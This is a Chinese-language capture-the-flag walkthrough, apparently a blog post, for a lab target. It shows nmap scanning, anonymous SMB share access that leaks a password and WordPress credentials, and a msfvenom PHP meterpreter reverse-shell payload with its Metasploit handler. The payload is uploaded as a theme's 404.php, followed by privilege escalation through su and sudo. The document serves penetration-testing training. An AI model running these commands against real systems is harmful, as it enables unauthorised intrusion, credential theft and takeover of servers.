CTF奪旗 SMB信息泄露

SMB(Server Message Block)通信協議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協議,主要是作爲Microsoft網絡的通訊協議。後來Linux移植了SMB,並稱爲samba。

實驗環境
1、Windows下虛擬機系統kali Linux,用了之後發現kali Linux系統裏面的那些小軟件特別多。
2、 靶場機器

我們的目的就是獲取靶場機器上的flag

信息探測:

對於只是給定的一個對應ip地址靶場機器,我們需要對其進行掃描,探測開放的服務。

打開終端,輸入
ifconfig
如下圖所示:
在這裏插入圖片描述滲透其實是針對服務的漏洞探測,然後進行對應的數據包發送,獲取機器的最高權限.

nmap -sV ip      挖掘開放服務信息

nmap -A -v -T4 ip     挖掘靶場全部信息

掃面之後發現, 端口開放了SMB服務,之後我們就可以進行登錄 。登錄時使用直接使用空密碼。

指令如下:

smbclient -L ip

然後下面就會緊跟着打印驅動、一個共享文件夾(share$)、一個空連接。
然後進行如下指令打開共享文件夾:

smbclient '\\ip\share$'

輸入指令ls查看共享的文件夾。發現sharegetgetshare裏發現許多敏感文件,用get 下載下來到本地查看 基本語法 get後加打開share裏面的文件名。
例如 deets.txt
然後另外打開終端新窗口輸入 cat deets.txt 然後可以發現泄露了一個密碼12345;
wordpress目錄下的config是個配置文件(小文件用cat看,大文件用gedit看)(一般配置文件都是泄露了用戶名和密碼),發現泄露了數據庫的用戶名和密碼。

製作webshell
基本語法:
msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機IP地址 lport=4444 -f raw > /root/Desktop/shell.php
啓用監聽:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻擊機IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

上傳webshell
一般會使用 dirb ip 進行網站探測
使用找到的敏感信息登錄系統後臺,上傳webshell。執行webshell(訪問具有webshell的php頁面)

獲得反彈的shell

wordpress 上傳點 theme 404.php
執行:http://靶場IP/wordpress/wp-content/themes/twentyfourteen/404.php

查找flag信息:
查找敏感信息,提升root權限,查看flag值。
優化終端:python –c “import pty; pty.spawn(”/bin/bash")’
查找用戶名: cat /etc/passwd
查找密碼: 在共享目錄下的敏感文件,提升權限
用於切換 su 用戶名(上述查找的用戶名)
sudo –l 查看上述su有哪些操作
su sudo 提升權限

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章